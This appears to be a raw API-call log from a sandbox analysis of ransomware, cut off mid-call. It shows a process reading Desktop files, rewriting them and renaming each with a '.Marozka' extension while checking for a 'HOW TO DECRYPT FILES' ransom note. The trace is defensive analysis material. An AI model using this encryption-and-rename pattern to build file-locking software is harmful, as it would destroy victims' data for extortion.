(dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0045.549] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Sv5MOmXZ4GcbjflYw.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\sv5momxz4gcbjflyw.mp3"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c336ee0, ftCreationTime.dwHighDateTime=0x1d4ce7d, ftLastAccessTime.dwLowDateTime=0x9812f2a0, ftLastAccessTime.dwHighDateTime=0x1d4c8c8, ftLastWriteTime.dwLowDateTime=0xdde104d1, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x2380)) returned 1 [0045.550] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0045.550] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\Sv5MOmXZ4GcbjflYw.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\sv5momxz4gcbjflyw.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\Sv5MOmXZ4GcbjflYw.mp3.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\sv5momxz4gcbjflyw.mp3.marozka")) returned 1 [0045.550] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\x0 sW.bmp", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\x0 sW.bmp", lpFilePart=0x0) returned 0x21 [0045.550] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0045.550] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\x0 sW.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\x0 sw.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0045.551] GetFileType (hFile=0x2e0) returned 0x1 [0045.551] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0045.551] GetFileType (hFile=0x2e0) returned 0x1 [0045.551] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x482c [0045.551] ReadFile (in: hFile=0x2e0, lpBuffer=0x27cc394, nNumberOfBytesToRead=0x482c, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x27cc394*, lpNumberOfBytesRead=0x5beabc*=0x482c, lpOverlapped=0x0) returned 1 [0045.552] CloseHandle (hObject=0x2e0) returned 1 [0045.590] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0045.590] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0045.590] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.590] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0045.590] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\x0 sW.bmp", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\x0 sW.bmp", lpFilePart=0x0) returned 0x21 [0045.590] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0045.590] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\x0 sW.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\x0 sw.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0045.592] GetFileType (hFile=0x2e0) returned 0x1 [0045.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0045.592] GetFileType (hFile=0x2e0) returned 0x1 [0045.592] WriteFile (in: hFile=0x2e0, lpBuffer=0x282fa6c*, nNumberOfBytesToWrite=0x4830, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x282fa6c*, lpNumberOfBytesWritten=0x5beab0*=0x4830, lpOverlapped=0x0) returned 1 [0045.593] CloseHandle (hObject=0x2e0) returned 1 [0045.598] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\x0 sW.bmp", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\x0 sW.bmp", lpFilePart=0x0) returned 0x21 [0045.598] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\x0 sW.bmp.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\x0 sW.bmp.Marozka", lpFilePart=0x0) returned 0x29 [0045.598] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0045.598] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\x0 sW.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\x0 sw.bmp"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5cfe90, ftCreationTime.dwHighDateTime=0x1d4c63a, ftLastAccessTime.dwLowDateTime=0xb9cfcbe0, ftLastAccessTime.dwHighDateTime=0x1d4cc9a, ftLastWriteTime.dwLowDateTime=0xdde82d84, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x4830)) returned 1 [0045.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0045.599] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\x0 sW.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\x0 sw.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\x0 sW.bmp.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\x0 sw.bmp.marozka")) returned 1 [0045.599] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\xZnX3pyCnDnk.avi", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\xZnX3pyCnDnk.avi", lpFilePart=0x0) returned 0x28 [0045.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0045.599] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\xZnX3pyCnDnk.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\xznx3pycndnk.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0045.600] GetFileType (hFile=0x2e0) returned 0x1 [0045.600] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0045.600] GetFileType (hFile=0x2e0) returned 0x1 [0045.600] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0xc076 [0045.600] ReadFile (in: hFile=0x2e0, lpBuffer=0x2834700, nNumberOfBytesToRead=0xc076, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x2834700*, lpNumberOfBytesRead=0x5beabc*=0xc076, lpOverlapped=0x0) returned 1 [0045.600] CloseHandle (hObject=0x2e0) returned 1 [0045.851] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0045.851] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0045.852] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0045.852] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\xZnX3pyCnDnk.avi", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\xZnX3pyCnDnk.avi", lpFilePart=0x0) returned 0x28 [0045.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0045.852] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\xZnX3pyCnDnk.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\xznx3pycndnk.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0045.854] GetFileType (hFile=0x2e0) returned 0x1 [0045.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0045.854] GetFileType (hFile=0x2e0) returned 0x1 [0045.854] WriteFile (in: hFile=0x2e0, lpBuffer=0x269bb20*, nNumberOfBytesToWrite=0xc080, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x269bb20*, lpNumberOfBytesWritten=0x5beab0*=0xc080, lpOverlapped=0x0) returned 1 [0045.856] CloseHandle (hObject=0x2e0) returned 1 [0045.858] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\xZnX3pyCnDnk.avi", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\xZnX3pyCnDnk.avi", lpFilePart=0x0) returned 0x28 [0045.858] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\xZnX3pyCnDnk.avi.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\xZnX3pyCnDnk.avi.Marozka", lpFilePart=0x0) returned 0x30 [0045.858] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0045.858] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\xZnX3pyCnDnk.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\xznx3pycndnk.avi"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3f95c90, ftCreationTime.dwHighDateTime=0x1d4cc2d, ftLastAccessTime.dwLowDateTime=0x5565b600, ftLastAccessTime.dwHighDateTime=0x1d4d0c9, ftLastWriteTime.dwLowDateTime=0xde10b33a, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xc080)) returned 1 [0045.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0045.858] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\xZnX3pyCnDnk.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\xznx3pycndnk.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\xZnX3pyCnDnk.avi.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\xznx3pycndnk.avi.marozka")) returned 1 [0045.859] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\YDHstR4MIW-3pN.doc", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\YDHstR4MIW-3pN.doc", lpFilePart=0x0) returned 0x2a [0045.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0045.859] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\YDHstR4MIW-3pN.doc" (normalized: "c:\\users\\fd1hvy\\desktop\\ydhstr4miw-3pn.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0045.859] GetFileType (hFile=0x2e0) returned 0x1 [0045.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0045.859] GetFileType (hFile=0x2e0) returned 0x1 [0045.859] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0xfe1 [0045.859] ReadFile (in: hFile=0x2e0, lpBuffer=0x26a904c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x26a904c*, lpNumberOfBytesRead=0x5beabc*=0xfe1, lpOverlapped=0x0) returned 1 [0045.860] CloseHandle (hObject=0x2e0) returned 1 [0045.952] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0045.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0045.952] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.952] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0045.952] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\YDHstR4MIW-3pN.doc", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\YDHstR4MIW-3pN.doc", lpFilePart=0x0) returned 0x2a [0045.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0045.952] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\YDHstR4MIW-3pN.doc" (normalized: "c:\\users\\fd1hvy\\desktop\\ydhstr4miw-3pn.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0045.953] GetFileType (hFile=0x2e0) returned 0x1 [0045.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0045.953] GetFileType (hFile=0x2e0) returned 0x1 [0045.953] WriteFile (in: hFile=0x2e0, lpBuffer=0x26fc1c8*, nNumberOfBytesToWrite=0xff0, lpNumberOfBytesWritten=0x5bea84, lpOverlapped=0x0 | out: lpBuffer=0x26fc1c8*, lpNumberOfBytesWritten=0x5bea84*=0xff0, lpOverlapped=0x0) returned 1 [0045.954] CloseHandle (hObject=0x2e0) returned 1 [0045.961] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\YDHstR4MIW-3pN.doc", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\YDHstR4MIW-3pN.doc", lpFilePart=0x0) returned 0x2a [0045.961] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\YDHstR4MIW-3pN.doc.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\YDHstR4MIW-3pN.doc.Marozka", lpFilePart=0x0) returned 0x32 [0045.961] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0045.962] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\YDHstR4MIW-3pN.doc" (normalized: "c:\\users\\fd1hvy\\desktop\\ydhstr4miw-3pn.doc"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7d628e0, ftCreationTime.dwHighDateTime=0x1d4c833, ftLastAccessTime.dwLowDateTime=0x62ac8750, ftLastAccessTime.dwHighDateTime=0x1d4c8ca, ftLastWriteTime.dwLowDateTime=0xde1f0197, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xff0)) returned 1 [0045.962] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0045.962] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\YDHstR4MIW-3pN.doc" (normalized: "c:\\users\\fd1hvy\\desktop\\ydhstr4miw-3pn.doc"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\YDHstR4MIW-3pN.doc.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\ydhstr4miw-3pn.doc.marozka")) returned 1 [0045.962] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\zBPMASKDOxJ2iktChDg.xls", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\zBPMASKDOxJ2iktChDg.xls", lpFilePart=0x0) returned 0x2f [0045.962] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0045.963] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\zBPMASKDOxJ2iktChDg.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\zbpmaskdoxj2iktchdg.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0045.963] GetFileType (hFile=0x2e0) returned 0x1 [0045.963] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0045.963] GetFileType (hFile=0x2e0) returned 0x1 [0045.963] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0xaae8 [0045.963] ReadFile (in: hFile=0x2e0, lpBuffer=0x26fd46c, nNumberOfBytesToRead=0xaae8, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x26fd46c*, lpNumberOfBytesRead=0x5beabc*=0xaae8, lpOverlapped=0x0) returned 1 [0045.963] CloseHandle (hObject=0x2e0) returned 1 [0045.987] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0045.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0045.987] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.987] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0045.987] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\zBPMASKDOxJ2iktChDg.xls", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\zBPMASKDOxJ2iktChDg.xls", lpFilePart=0x0) returned 0x2f [0045.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0045.987] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\zBPMASKDOxJ2iktChDg.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\zbpmaskdoxj2iktchdg.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0045.989] GetFileType (hFile=0x2e0) returned 0x1 [0045.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0045.989] GetFileType (hFile=0x2e0) returned 0x1 [0045.989] WriteFile (in: hFile=0x2e0, lpBuffer=0x276a338*, nNumberOfBytesToWrite=0xaaf0, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x276a338*, lpNumberOfBytesWritten=0x5beab0*=0xaaf0, lpOverlapped=0x0) returned 1 [0045.992] CloseHandle (hObject=0x2e0) returned 1 [0046.184] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\zBPMASKDOxJ2iktChDg.xls", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\zBPMASKDOxJ2iktChDg.xls", lpFilePart=0x0) returned 0x2f [0046.184] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\zBPMASKDOxJ2iktChDg.xls.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\zBPMASKDOxJ2iktChDg.xls.Marozka", lpFilePart=0x0) returned 0x37 [0046.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0046.184] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\zBPMASKDOxJ2iktChDg.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\zbpmaskdoxj2iktchdg.xls"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfab05ef0, ftCreationTime.dwHighDateTime=0x1d4d1b7, ftLastAccessTime.dwLowDateTime=0x26b22800, ftLastAccessTime.dwHighDateTime=0x1d4c6e4, ftLastWriteTime.dwLowDateTime=0xde432f60, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xaaf0)) returned 1 [0046.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0046.184] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\zBPMASKDOxJ2iktChDg.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\zbpmaskdoxj2iktchdg.xls"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\zBPMASKDOxJ2iktChDg.xls.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\zbpmaskdoxj2iktchdg.xls.marozka")) returned 1 [0046.277] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ZyG16so2LwLHdHrDfA.ppt", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ZyG16so2LwLHdHrDfA.ppt", lpFilePart=0x0) returned 0x2e [0046.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0046.277] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ZyG16so2LwLHdHrDfA.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\zyg16so2lwlhdhrdfa.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0046.277] GetFileType (hFile=0x2e0) returned 0x1 [0046.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0046.277] GetFileType (hFile=0x2e0) returned 0x1 [0046.277] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x10406 [0046.277] ReadFile (in: hFile=0x2e0, lpBuffer=0x2775348, nNumberOfBytesToRead=0x10406, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x2775348*, lpNumberOfBytesRead=0x5beabc*=0x10406, lpOverlapped=0x0) returned 1 [0046.278] CloseHandle (hObject=0x2e0) returned 1 [0046.305] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0046.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0046.305] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0046.305] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ZyG16so2LwLHdHrDfA.ppt", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ZyG16so2LwLHdHrDfA.ppt", lpFilePart=0x0) returned 0x2e [0046.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0046.305] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ZyG16so2LwLHdHrDfA.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\zyg16so2lwlhdhrdfa.ppt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0046.307] GetFileType (hFile=0x2e0) returned 0x1 [0046.307] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0046.307] GetFileType (hFile=0x2e0) returned 0x1 [0046.307] WriteFile (in: hFile=0x2e0, lpBuffer=0x27f2d78*, nNumberOfBytesToWrite=0x10410, lpNumberOfBytesWritten=0x5beab0, 